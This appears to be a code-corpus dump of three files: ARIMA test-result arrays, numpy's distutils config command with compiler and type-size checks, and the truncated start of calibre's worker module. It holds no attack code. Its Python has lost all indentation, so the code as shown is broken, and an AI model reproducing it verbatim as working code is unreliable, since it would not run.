1.7309991121292,
1.8975404500961,
1.8579913377762,
1.8846583366394,
1.9672524929047,
1.9469071626663,
2.0048115253448,
1.9786299467087,
1.8213576078415,
1.6284521818161,
1.7508568763733,
1.5689061880112,
1.2950873374939,
1.2290096282959,
1.1882168054581,
1.1537625789642,
1.1697143316269,
1.1681711673737,
1.106795668602,
1.0849931240082,
1.006507396698,
1.0453414916992,
.98803448677063,
.95465070009232,
1.0165599584579,
.67838954925537,
.69311982393265,
.69054269790649,
.76345545053482,
.84005492925644,
.87471830844879,
.91901183128357,
.92638796567917,
.96265280246735,
1.0083012580872,
1.0618740320206,
1.0921038389206,
1.2077431678772,
1.2303256988525,
1.174311041832,
1.3072115182877,
1.314337015152,
1.3503924608231,
1.5760731697083,
1.5264053344727,
1.34929728508,
1.304829955101,
1.2522557973862,
1.222869515419,
1.198047041893,
1.1770839691162,
1.1743944883347,
1.1571066379547,
1.1274864673615,
1.0574153661728,
1.058304309845,
.99898308515549,
.9789143204689,
1.0070173740387,
1.000718832016,
1.0104174613953,
1.0486439466476,
1.0058424472809,
.98470783233643,
1.0119106769562,
1.0649236440659,
1.0346088409424,
1.0540577173233,
1.0704846382141,
.97923594713211,
.90216588973999,
.9271782040596,
.85819715261459,
.75488126277924,
.78776079416275,
.77047789096832,
.77089905738831,
.8313245177269,
.82229107618332,
.90476810932159,
.94439232349396,
1.0379292964935,
1.1469690799713,
1.1489590406418,
1.2257302999496,
1.1554099321365,
1.1260533332825,
.9811190366745,
.8436843752861,
.95287209749222,
.90993344783783,
.94875508546829,
1.0115815401077,
.94450175762177,
.87282890081406,
.91741597652435,
.98511207103729,
.9972335100174,
1.0975805521011,
1.1823329925537,
1.1487929821014,
1.270641207695,
1.2083609104156,
1.696394443512,
1.4628355503082,
1.4307631254196,
1.5087975263596,
1.1542117595673,
1.2262620925903,
1.3880327939987,
1.3853038549423,
1.4396153688431,
1.7208145856857,
1.678991317749,
2.110867023468,
1.524417757988,
.57946246862411,
.56406193971634,
.74643105268478])
y = np.array([np.nan,
28.979999542236,
29.178695678711,
29.40651512146,
29.420400619507,
29.608880996704,
29.609405517578,
29.830673217773,
29.921676635742,
29.874292373657,
29.990877151489,
30.048864364624,
30.10717010498,
30.292304992676,
30.290996551514,
30.464012145996,
30.519966125488,
30.553541183472,
30.783664703369,
30.838117599487,
31.042964935303,
31.038463592529,
31.105230331421,
31.207004547119,
31.377513885498,
31.477378845215,
31.692283630371,
31.755348205566,
32.003520965576,
32.444396972656,
32.61438369751,
33.048908233643,
33.07551574707,
33.278274536133,
33.595630645752,
33.91028213501,
34.337677001953,
34.645801544189,
35.182697296143,
35.598838806152,
36.012474060059,
36.654026031494,
37.174102783203,
37.691062927246,
38.320404052734,
38.94518661499,
39.336082458496,
39.843410491943,
40.349597930908,
40.509769439697,
41.021186828613,
41.300796508789,
41.583572387695,
41.869022369385,
42.156734466553,
42.561374664307,
43.080310821533,
44.171394348145,
44.673233032227,
46.209945678711,
47.495380401611,
48.882556915283,
50.141174316406,
51.965770721436,
53.310932159424,
53.958972930908,
54.960140228271,
55.84610748291,
56.734252929688,
56.934139251709,
57.839687347412,
58.744373321533,
59.533309936523,
60.899055480957,
61.679496765137,
62.46297454834,
63.594078063965,
64.83536529541,
66.530303955078,
68.210494995117,
69.64818572998,
71.885147094727,
74.445877075195,
76.751594543457,
79.731002807617,
82.797538757324,
84.457992553711,
86.584655761719,
89.167251586914,
91.046905517578,
93.504814147949,
95.378631591797,
96.22135925293,
96.628448486328,
99.250854492188,
99.668907165527,
99.195091247559,
100.0290145874,
100.98822021484,
101.95376586914,
103.26971435547,
104.46817779541,
105.20679473877,
106.1849899292,
106.70650482178,
108.0453414917,
108.68803405762,
109.45465087891,
110.91656494141,
109.37838745117,
110.19312286377,
110.89054107666,
112.16345977783,
113.54005432129,
114.67472076416,
115.91901397705,
116.92639160156,
118.16265106201,
119.50830078125,
120.96187591553,
122.29209899902,
124.30773925781,
125.7303237915,
126.57431030273,
128.8072052002,
130.21432495117,
131.85038757324,
134.97607421875,
136.22640991211,
136.44931030273,
137.50482177734,
138.45225524902,
139.5228729248,
140.59803771973,
141.67707824707,
142.87438964844,
143.95710754395,
144.92749023438,
145.55741882324,
146.65830993652,
147.29898071289,
148.17890930176,
149.40701293945,
150.40071105957,
151.51042175293,
152.84864807129,
153.60585021973,
154.48471069336,
155.7119140625,
157.16493225098,
158.03460693359,
159.25405883789,
160.47047424316,
160.87922668457,
161.30215454102,
162.42718505859,
162.85820007324,
162.95487976074,
163.98776245117,
164.67047119141,
165.47090148926,
166.73132324219,
167.52229309082,
169.00477600098,
170.24440002441,
171.93792724609,
173.84696960449,
175.04895019531,
176.82572937012,
177.55540466309,
178.52604675293,
178.58113098145,
178.54368591309,
180.25286865234,
180.90992736816,
182.14875793457,
183.61158752441,
184.14450073242,
184.5728302002,
185.81741333008,
187.28511047363,
188.39723205566,
190.19758605957,
191.98233032227,
192.94879150391,
195.07064819336,
195.90835571289,
200.89639282227,
200.86282348633,
202.13075256348,
204.20880126953,
203.05419921875,
204.80026245117,
207.3080291748,
208.72329711914,
210.57261657715,
214.21580505371,
215.67597961426,
220.72087097168,
218.41342163086,
212.75346374512,
213.23506164551,
215.21542358398])
resid = np.array([np.nan,
.17000007629395,
.17130389809608,
-.03651398047805,
.11960058659315,
-.05888139456511,
.14059536159039,
.00932686589658,
-.11167634278536,
.04570783302188,
-.0108770346269,
-.00886330008507,
.10282856971025,
-.07230624556541,
.08900293707848,
-.0240114107728,
-.03996651992202,
.13645842671394,
-.03366377204657,
.10188252478838,
-.09296332299709,
-.01846401393414,
.01477065030485,
.0729955881834,
.00248436117545,
.10262141376734,
-.04228436201811,
.12465056031942,
.27647939324379,
.00560382334515,
.23561419546604,
-.1489082723856,
.02448422275484,
.12172746658325,
.10437148809433,
.18971465528011,
.06232447177172,
.25419962406158,
.11730266362429,
.10116269439459,
.2875237762928,
.14597341418266,
.12589547038078,
.20893961191177,
.17959471046925,
-.04518361017108,
.06391899287701,
.05659105628729,
-.24960128962994,
.09022761881351,
-.12118522822857,
-.10079623758793,
-.08357158303261,
-.06902338564396,
.04326653853059,
.13862533867359,
.61968916654587,
.02860714122653,
.92676383256912,
.59005337953568,
.60461646318436,
.41744044423103,
.85882639884949,
.33423033356667,
-.31093180179596,
.04102724045515,
-.06013804674149,
-.04610994458199,
-.63425624370575,
.06586220860481,
.06031560897827,
-.04437142238021,
.46668976545334,
-.09905604273081,
-.07949769496918,
.23702463507652,
.30592212080956,
.66463404893875,
.56969320774078,
.28950771689415,
.95181107521057,
1.1148544549942,
.75411820411682,
1.2484039068222,
1.1690024137497,
-.1975435167551,
.24200716614723,
.6153416633606,
-.06725100427866,
.45309436321259,
-.10480991750956,
-.97863000631332,
-1.2213591337204,
.8715478181839,
-1.1508584022522,
-1.7689031362534,
-.39508575201035,
-.22900961339474,
-.18821682035923,
.14623281359673,
.03029025532305,
-.36817568540573,
-.10679569840431,
-.48499462008476,
.29349562525749,
-.34534454345703,
-.18803144991398,
.44535079598427,
-2.2165644168854,
.12161350995302,
.00687709869817,
.50946187973022,
.53653997182846,
.25995117425919,
.32527860999107,
.08098815381527,
.27360898256302,
.33735024929047,
.39170032739639,
.23812144994736,
.80789774656296,
.19225835800171,
-.33032417297363,
.92568749189377,
.09278241544962,
.28566908836365,
1.5496014356613,
-.27607008814812,
-1.1263961791992,
-.24930645525455,
-.30482992529869,
-.15224970877171,
-.12287864089012,
-.09804095327854,
.02291300706565,
-.07438835501671,
-.15710659325123,
-.42748948931694,
.04259072244167,
-.35830733180046,
-.09898918122053,
.22108262777328,
-.00701736938208,
.0992873236537,
.28958559036255,
-.24864092469215,
-.10584850609303,
.21528913080692,
.38809850811958,
-.16492980718613,
.16538816690445,
.1459391862154,
-.57048463821411,
-.47923597693443,
.19784018397331,
-.4271782040596,
-.65820020437241,
.24511873722076,
-.0877638310194,
.02952514961362,
.42909786105156,
-.03132146969438,
.57771807909012,
.29522883892059,
.6555985212326,
.76207375526428,
.05302781611681,
.55105316638947,
-.42574247717857,
-.15540990233421,
-.92604118585587,
-.88112819194794,
.75632172822952,
-.25287514925003,
.29006350040436,
.45125409960747,
-.41159069538116,
-.44450175762177,
.32716807723045,
.48259317874908,
.11487878113985,
.70277869701385,
.60241633653641,
-.18233296275139,
.85120695829391,
-.37064728140831,
3.2916390895844,
-1.4963974952698,
-.16283248364925,
.56923681497574,
-2.3088004589081,
.51979947090149,
1.1197309494019,
.02996650896966,
.40969428420067,
1.9223841428757,
-.21881568431854,
2.9340152740479,
-3.8318600654602,
-6.239429473877,
-.08245316892862,
1.2339268922806,
1.1695692539215])
yr = np.array([np.nan,
.17000007629395,
.17130389809608,
-.03651398047805,
.11960058659315,
-.05888139456511,
.14059536159039,
.00932686589658,
-.11167634278536,
.04570783302188,
-.0108770346269,
-.00886330008507,
.10282856971025,
-.07230624556541,
.08900293707848,
-.0240114107728,
-.03996651992202,
.13645842671394,
-.03366377204657,
.10188252478838,
-.09296332299709,
-.01846401393414,
.01477065030485,
.0729955881834,
.00248436117545,
.10262141376734,
-.04228436201811,
.12465056031942,
.27647939324379,
.00560382334515,
.23561419546604,
-.1489082723856,
.02448422275484,
.12172746658325,
.10437148809433,
.18971465528011,
.06232447177172,
.25419962406158,
.11730266362429,
.10116269439459,
.2875237762928,
.14597341418266,
.12589547038078,
.20893961191177,
.17959471046925,
-.04518361017108,
.06391899287701,
.05659105628729,
-.24960128962994,
.09022761881351,
-.12118522822857,
-.10079623758793,
-.08357158303261,
-.06902338564396,
.04326653853059,
.13862533867359,
.61968916654587,
.02860714122653,
.92676383256912,
.59005337953568,
.60461646318436,
.41744044423103,
.85882639884949,
.33423033356667,
-.31093180179596,
.04102724045515,
-.06013804674149,
-.04610994458199,
-.63425624370575,
.06586220860481,
.06031560897827,
-.04437142238021,
.46668976545334,
-.09905604273081,
-.07949769496918,
.23702463507652,
.30592212080956,
.66463404893875,
.56969320774078,
.28950771689415,
.95181107521057,
1.1148544549942,
.75411820411682,
1.2484039068222,
1.1690024137497,
-.1975435167551,
.24200716614723,
.6153416633606,
-.06725100427866,
.45309436321259,
-.10480991750956,
-.97863000631332,
-1.2213591337204,
.8715478181839,
-1.1508584022522,
-1.7689031362534,
-.39508575201035,
-.22900961339474,
-.18821682035923,
.14623281359673,
.03029025532305,
-.36817568540573,
-.10679569840431,
-.48499462008476,
.29349562525749,
-.34534454345703,
-.18803144991398,
.44535079598427,
-2.2165644168854,
.12161350995302,
.00687709869817,
.50946187973022,
.53653997182846,
.25995117425919,
.32527860999107,
.08098815381527,
.27360898256302,
.33735024929047,
.39170032739639,
.23812144994736,
.80789774656296,
.19225835800171,
-.33032417297363,
.92568749189377,
.09278241544962,
.28566908836365,
1.5496014356613,
-.27607008814812,
-1.1263961791992,
-.24930645525455,
-.30482992529869,
-.15224970877171,
-.12287864089012,
-.09804095327854,
.02291300706565,
-.07438835501671,
-.15710659325123,
-.42748948931694,
.04259072244167,
-.35830733180046,
-.09898918122053,
.22108262777328,
-.00701736938208,
.0992873236537,
.28958559036255,
-.24864092469215,
-.10584850609303,
.21528913080692,
.38809850811958,
-.16492980718613,
.16538816690445,
.1459391862154,
-.57048463821411,
-.47923597693443,
.19784018397331,
-.4271782040596,
-.65820020437241,
.24511873722076,
-.0877638310194,
.02952514961362,
.42909786105156,
-.03132146969438,
.57771807909012,
.29522883892059,
.6555985212326,
.76207375526428,
.05302781611681,
.55105316638947,
-.42574247717857,
-.15540990233421,
-.92604118585587,
-.88112819194794,
.75632172822952,
-.25287514925003,
.29006350040436,
.45125409960747,
-.41159069538116,
-.44450175762177,
.32716807723045,
.48259317874908,
.11487878113985,
.70277869701385,
.60241633653641,
-.18233296275139,
.85120695829391,
-.37064728140831,
3.2916390895844,
-1.4963974952698,
-.16283248364925,
.56923681497574,
-2.3088004589081,
.51979947090149,
1.1197309494019,
.02996650896966,
.40969428420067,
1.9223841428757,
-.21881568431854,
2.9340152740479,
-3.8318600654602,
-6.239429473877,
-.08245316892862,
1.2339268922806,
1.1695692539215])
mse = np.array([ 1.1112809181213,
.6632194519043,
.65879660844803,
.65575885772705,
.65364873409271,
.65217137336731,
.65113133192062,
.6503963470459,
.64987552165985,
.64950579404831,
.64924287796021,
.64905577898026,
.64892256259918,
.64882761240005,
.64875996112823,
.64871168136597,
.64867728948593,
.64865279197693,
.64863526821136,
.64862281084061,
.64861387014389,
.64860755205154,
.64860302209854,
.64859980344772,
.64859747886658,
.64859586954117,
.64859467744827,
.64859384298325,
.6485932469368,
.64859282970428,
.64859253168106,
.64859229326248,
.64859211444855,
.64859199523926,
.64859193563461,
.64859187602997,
.64859187602997,
.64859181642532,
.64859181642532,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068])
stdp = np.array([ 0,
0,
.02869686298072,
.05651443824172,
.0503994859755,
.06887971609831,
.05940540507436,
.08067328482866,
.08167565613985,
.06429278105497,
.07087650150061,
.06886467337608,
.06716959923506,
.08230647444725,
.07099691033363,
.08401278406382,
.07996553182602,
.07354256510735,
.09366323798895,
.08811800926924,
.10296355187893,
.08846370875835,
.0852297320962,
.08700425922871,
.09751411527395,
.09737934917212,
.11228405684233,
.1053489819169,
.12352022528648,
.16439816355705,
.1643835157156,
.19891132414341,
.17551273107529,
.17827558517456,
.19562774896622,
.21028305590153,
.23767858743668,
.24580039083958,
.28269505500793,
.29883882403374,
.31247469782829,
.35402658581734,
.37410452961922,
.39106267690659,
.42040377855301,
.44518512487411,
.43608102202415,
.44340893626213,
.44959822297096,
.40977239608765,
.42118826508522,
.40079545974731,
.38357082009315,
.36902260780334,
.35673499107361,
.36137464642525,
.38031083345413,
.47139286994934,
.47323387861252,
.60994738340378,
.69538277387619,
.7825602889061,
.84117436408997,
.9657689332962,
1.0109325647354,
.95897275209427,
.96013957262039,
.9461076259613,
.9342554807663,
.83413934707642,
.83968591690063,
.84437066316605,
.83330947160721,
.8990553021431,
.87949693202972,
.86297762393951,
.89407861232758,
.93536442518234,
1.0303052663803,
1.1104937791824,
1.1481873989105,
1.2851470708847,
1.4458787441254,
1.5515991449356,
1.7309991121292,
1.8975404500961,
1.8579913377762,
1.8846583366394,
1.9672524929047,
1.9469071626663,
2.0048115253448,
1.9786299467087,
1.8213576078415,
1.6284521818161,
1.7508568763733,
1.5689061880112,
1.2950873374939,
1.2290096282959,
1.1882168054581,
1.1537625789642,
1.1697143316269,
1.1681711673737,
1.106795668602,
1.0849931240082,
1.006507396698,
1.0453414916992,
.98803448677063,
.95465070009232,
1.0165599584579,
.67838954925537,
.69311982393265,
.69054269790649,
.76345545053482,
.84005492925644,
.87471830844879,
.91901183128357,
.92638796567917,
.96265280246735,
1.0083012580872,
1.0618740320206,
1.0921038389206,
1.2077431678772,
1.2303256988525,
1.174311041832,
1.3072115182877,
1.314337015152,
1.3503924608231,
1.5760731697083,
1.5264053344727,
1.34929728508,
1.304829955101,
1.2522557973862,
1.222869515419,
1.198047041893,
1.1770839691162,
1.1743944883347,
1.1571066379547,
1.1274864673615,
1.0574153661728,
1.058304309845,
.99898308515549,
.9789143204689,
1.0070173740387,
1.000718832016,
1.0104174613953,
1.0486439466476,
1.0058424472809,
.98470783233643,
1.0119106769562,
1.0649236440659,
1.0346088409424,
1.0540577173233,
1.0704846382141,
.97923594713211,
.90216588973999,
.9271782040596,
.85819715261459,
.75488126277924,
.78776079416275,
.77047789096832,
.77089905738831,
.8313245177269,
.82229107618332,
.90476810932159,
.94439232349396,
1.0379292964935,
1.1469690799713,
1.1489590406418,
1.2257302999496,
1.1554099321365,
1.1260533332825,
.9811190366745,
.8436843752861,
.95287209749222,
.90993344783783,
.94875508546829,
1.0115815401077,
.94450175762177,
.87282890081406,
.91741597652435,
.98511207103729,
.9972335100174,
1.0975805521011,
1.1823329925537,
1.1487929821014,
1.270641207695,
1.2083609104156,
1.696394443512,
1.4628355503082,
1.4307631254196,
1.5087975263596,
1.1542117595673,
1.2262620925903,
1.3880327939987,
1.3853038549423,
1.4396153688431,
1.7208145856857,
1.678991317749,
2.110867023468,
1.524417757988,
.57946246862411,
.56406193971634,
.74643105268478])
icstats = np.array([ 202,
np.nan,
-242.89663276735,
3,
491.79326553469,
501.7180686269])
class Bunch(dict):
def __init__(self, **kw):
dict.__init__(self, kw)
self.__dict__ = self
results = Bunch(llf=llf, nobs=nobs, k=k, k_exog=k_exog, sigma=sigma, chi2=chi2, df_model=df_model, k_ar=k_ar, k_ma=k_ma, params=params, cov_params=cov_params, xb=xb, y=y, resid=resid, yr=yr, mse=mse, stdp=stdp, icstats=icstats, )
|
bsd-3-clause
|
sinhrks/numpy
|
numpy/distutils/command/config.py
|
11
|
15829
|
# Added Fortran compiler support to config. Currently useful only for
# try_compile call. try_run works but is untested for most of Fortran
# compilers (they must define linker_exe first).
# Pearu Peterson
from __future__ import division, absolute_import, print_function
import os, signal
import warnings
import sys
from distutils.command.config import config as old_config
from distutils.command.config import LANG_EXT
from distutils import log
from distutils.file_util import copy_file
from distutils.ccompiler import CompileError, LinkError
import distutils
from numpy.distutils.exec_command import exec_command
from numpy.distutils.mingw32ccompiler import generate_manifest
from numpy.distutils.command.autodist import (check_gcc_function_attribute,
check_gcc_variable_attribute,
check_inline,
check_restrict,
check_compiler_gcc4)
from numpy.distutils.compat import get_exception
LANG_EXT['f77'] = '.f'
LANG_EXT['f90'] = '.f90'
class config(old_config):
old_config.user_options += [
('fcompiler=', None, "specify the Fortran compiler type"),
]
def initialize_options(self):
self.fcompiler = None
old_config.initialize_options(self)
def _check_compiler (self):
old_config._check_compiler(self)
from numpy.distutils.fcompiler import FCompiler, new_fcompiler
if sys.platform == 'win32' and self.compiler.compiler_type == 'msvc':
# XXX: hack to circumvent a python 2.6 bug with msvc9compiler:
# initialize call query_vcvarsall, which throws an IOError, and
# causes an error along the way without much information. We try to
# catch it here, hoping it is early enough, and print an helpful
# message instead of Error: None.
if not self.compiler.initialized:
try:
self.compiler.initialize()
except IOError:
e = get_exception()
msg = """\
Could not initialize compiler instance: do you have Visual Studio
installed? If you are trying to build with MinGW, please use "python setup.py
build -c mingw32" instead. If you have Visual Studio installed, check it is
correctly installed, and the right version (VS 2008 for python 2.6, 2.7 and 3.2,
VS 2010 for >= 3.3).
Original exception was: %s, and the Compiler class was %s
============================================================================""" \
% (e, self.compiler.__class__.__name__)
print ("""\
============================================================================""")
raise distutils.errors.DistutilsPlatformError(msg)
# After MSVC is initialized, add an explicit /MANIFEST to linker
# flags. See issues gh-4245 and gh-4101 for details. Also
# relevant are issues 4431 and 16296 on the Python bug tracker.
from distutils import msvc9compiler
if msvc9compiler.get_build_version() >= 10:
for ldflags in [self.compiler.ldflags_shared,
self.compiler.ldflags_shared_debug]:
if '/MANIFEST' not in ldflags:
ldflags.append('/MANIFEST')
if not isinstance(self.fcompiler, FCompiler):
self.fcompiler = new_fcompiler(compiler=self.fcompiler,
dry_run=self.dry_run, force=1,
c_compiler=self.compiler)
if self.fcompiler is not None:
self.fcompiler.customize(self.distribution)
if self.fcompiler.get_version():
self.fcompiler.customize_cmd(self)
self.fcompiler.show_customization()
def _wrap_method(self, mth, lang, args):
from distutils.ccompiler import CompileError
from distutils.errors import DistutilsExecError
save_compiler = self.compiler
if lang in ['f77', 'f90']:
self.compiler = self.fcompiler
try:
ret = mth(*((self,)+args))
except (DistutilsExecError, CompileError):
msg = str(get_exception())
self.compiler = save_compiler
raise CompileError
self.compiler = save_compiler
return ret
def _compile (self, body, headers, include_dirs, lang):
return self._wrap_method(old_config._compile, lang,
(body, headers, include_dirs, lang))
def _link (self, body,
headers, include_dirs,
libraries, library_dirs, lang):
if self.compiler.compiler_type=='msvc':
libraries = (libraries or [])[:]
library_dirs = (library_dirs or [])[:]
if lang in ['f77', 'f90']:
lang = 'c' # always use system linker when using MSVC compiler
if self.fcompiler:
for d in self.fcompiler.library_dirs or []:
# correct path when compiling in Cygwin but with
# normal Win Python
if d.startswith('/usr/lib'):
s, o = exec_command(['cygpath', '-w', d],
use_tee=False)
if not s: d = o
library_dirs.append(d)
for libname in self.fcompiler.libraries or []:
if libname not in libraries:
libraries.append(libname)
for libname in libraries:
if libname.startswith('msvc'): continue
fileexists = False
for libdir in library_dirs or []:
libfile = os.path.join(libdir, '%s.lib' % (libname))
if os.path.isfile(libfile):
fileexists = True
break
if fileexists: continue
# make g77-compiled static libs available to MSVC
fileexists = False
for libdir in library_dirs:
libfile = os.path.join(libdir, 'lib%s.a' % (libname))
if os.path.isfile(libfile):
# copy libname.a file to name.lib so that MSVC linker
# can find it
libfile2 = os.path.join(libdir, '%s.lib' % (libname))
copy_file(libfile, libfile2)
self.temp_files.append(libfile2)
fileexists = True
break
if fileexists: continue
log.warn('could not find library %r in directories %s' \
% (libname, library_dirs))
elif self.compiler.compiler_type == 'mingw32':
generate_manifest(self)
return self._wrap_method(old_config._link, lang,
(body, headers, include_dirs,
libraries, library_dirs, lang))
def check_header(self, header, include_dirs=None, library_dirs=None, lang='c'):
self._check_compiler()
return self.try_compile(
"/* we need a dummy line to make distutils happy */",
[header], include_dirs)
def check_decl(self, symbol,
headers=None, include_dirs=None):
self._check_compiler()
body = """
int main(void)
{
#ifndef %s
(void) %s;
#endif
;
return 0;
}""" % (symbol, symbol)
return self.try_compile(body, headers, include_dirs)
def check_macro_true(self, symbol,
headers=None, include_dirs=None):
self._check_compiler()
body = """
int main(void)
{
#if %s
#else
#error false or undefined macro
#endif
;
return 0;
}""" % (symbol,)
return self.try_compile(body, headers, include_dirs)
def check_type(self, type_name, headers=None, include_dirs=None,
library_dirs=None):
"""Check type availability. Return True if the type can be compiled,
False otherwise"""
self._check_compiler()
# First check the type can be compiled
body = r"""
int main(void) {
if ((%(name)s *) 0)
return 0;
if (sizeof (%(name)s))
return 0;
}
""" % {'name': type_name}
st = False
try:
try:
self._compile(body % {'type': type_name},
headers, include_dirs, 'c')
st = True
except distutils.errors.CompileError:
st = False
finally:
self._clean()
return st
def check_type_size(self, type_name, headers=None, include_dirs=None, library_dirs=None, expected=None):
"""Check size of a given type."""
self._check_compiler()
# First check the type can be compiled
body = r"""
typedef %(type)s npy_check_sizeof_type;
int main (void)
{
static int test_array [1 - 2 * !(((long) (sizeof (npy_check_sizeof_type))) >= 0)];
test_array [0] = 0
;
return 0;
}
"""
self._compile(body % {'type': type_name},
headers, include_dirs, 'c')
self._clean()
if expected:
body = r"""
typedef %(type)s npy_check_sizeof_type;
int main (void)
{
static int test_array [1 - 2 * !(((long) (sizeof (npy_check_sizeof_type))) == %(size)s)];
test_array [0] = 0
;
return 0;
}
"""
for size in expected:
try:
self._compile(body % {'type': type_name, 'size': size},
headers, include_dirs, 'c')
self._clean()
return size
except CompileError:
pass
# this fails to *compile* if size > sizeof(type)
body = r"""
typedef %(type)s npy_check_sizeof_type;
int main (void)
{
static int test_array [1 - 2 * !(((long) (sizeof (npy_check_sizeof_type))) <= %(size)s)];
test_array [0] = 0
;
return 0;
}
"""
# The principle is simple: we first find low and high bounds of size
# for the type, where low/high are looked up on a log scale. Then, we
# do a binary search to find the exact size between low and high
low = 0
mid = 0
while True:
try:
self._compile(body % {'type': type_name, 'size': mid},
headers, include_dirs, 'c')
self._clean()
break
except CompileError:
#log.info("failure to test for bound %d" % mid)
low = mid + 1
mid = 2 * mid + 1
high = mid
# Binary search:
while low != high:
mid = (high - low) // 2 + low
try:
self._compile(body % {'type': type_name, 'size': mid},
headers, include_dirs, 'c')
self._clean()
high = mid
except CompileError:
low = mid + 1
return low
def check_func(self, func,
headers=None, include_dirs=None,
libraries=None, library_dirs=None,
decl=False, call=False, call_args=None):
# clean up distutils's config a bit: add void to main(), and
# return a value.
self._check_compiler()
body = []
if decl:
if type(decl) == str:
body.append(decl)
else:
body.append("int %s (void);" % func)
# Handle MSVC intrinsics: force MS compiler to make a function call.
# Useful to test for some functions when built with optimization on, to
# avoid build error because the intrinsic and our 'fake' test
# declaration do not match.
body.append("#ifdef _MSC_VER")
body.append("#pragma function(%s)" % func)
body.append("#endif")
body.append("int main (void) {")
if call:
if call_args is None:
call_args = ''
body.append(" %s(%s);" % (func, call_args))
else:
body.append(" %s;" % func)
body.append(" return 0;")
body.append("}")
body = '\n'.join(body) + "\n"
return self.try_link(body, headers, include_dirs,
libraries, library_dirs)
def check_funcs_once(self, funcs,
headers=None, include_dirs=None,
libraries=None, library_dirs=None,
decl=False, call=False, call_args=None):
"""Check a list of functions at once.
This is useful to speed up things, since all the functions in the funcs
list will be put in one compilation unit.
Arguments
---------
funcs : seq
list of functions to test
include_dirs : seq
list of header paths
libraries : seq
list of libraries to link the code snippet to
libraru_dirs : seq
list of library paths
decl : dict
for every (key, value), the declaration in the value will be
used for function in key. If a function is not in the
dictionay, no declaration will be used.
call : dict
for every item (f, value), if the value is True, a call will be
done to the function f.
"""
self._check_compiler()
body = []
if decl:
for f, v in decl.items():
if v:
body.append("int %s (void);" % f)
# Handle MS intrinsics. See check_func for more info.
body.append("#ifdef _MSC_VER")
for func in funcs:
body.append("#pragma function(%s)" % func)
body.append("#endif")
body.append("int main (void) {")
if call:
for f in funcs:
if f in call and call[f]:
if not (call_args and f in call_args and call_args[f]):
args = ''
else:
args = call_args[f]
body.append(" %s(%s);" % (f, args))
else:
body.append(" %s;" % f)
else:
for f in funcs:
body.append(" %s;" % f)
body.append(" return 0;")
body.append("}")
body = '\n'.join(body) + "\n"
return self.try_link(body, headers, include_dirs,
libraries, library_dirs)
def check_inline(self):
"""Return the inline keyword recognized by the compiler, empty string
otherwise."""
return check_inline(self)
def check_restrict(self):
"""Return the restrict keyword recognized by the compiler, empty string
otherwise."""
return check_restrict(self)
def check_compiler_gcc4(self):
"""Return True if the C compiler is gcc >= 4."""
return check_compiler_gcc4(self)
def check_gcc_function_attribute(self, attribute, name):
return check_gcc_function_attribute(self, attribute, name)
def check_gcc_variable_attribute(self, attribute):
return check_gcc_variable_attribute(self, attribute)
class GrabStdout(object):
def __init__(self):
self.sys_stdout = sys.stdout
self.data = ''
sys.stdout = self
def write (self, data):
self.sys_stdout.write(data)
self.data += data
def flush (self):
self.sys_stdout.flush()
def restore(self):
sys.stdout = self.sys_stdout
|
bsd-3-clause
|
AnotherIvan/calibre
|
src/calibre/utils/ipc/worker.py
|
8
|
7329
|
#!/usr/bin/env python2
# vim:fileencoding=UTF-8:ts=4:sw=4:sta:et:sts=4:ai
from __future__ import with_statement
__license__ = 'GPL v3'
__copyright__ = '2009, Kovid Goyal <kovid@kovidgoyal.net>'
__docformat__ = 'restructuredtext en'
import os, cPickle, sys, importlib
from multiprocessing.connection import Client
from threading import Thread
from Queue import Queue
from contextlib import closing
from binascii import unhexlify
from zipimport import ZipImportError
from calibre import prints
from calibre.constants import iswindows, isosx
from calibre.utils.ipc import eintr_retry_call
PARALLEL_FUNCS = {
'lrfviewer' :
('calibre.gui2.lrf_renderer.main', 'main', None),
'ebook-viewer' :
('calibre.gui_launch', 'ebook_viewer', None),
'ebook-edit' :
('calibre.gui_launch', 'gui_ebook_edit', None),
'render_pages' :
('calibre.ebooks.comic.input', 'render_pages', 'notification'),
'gui_convert' :
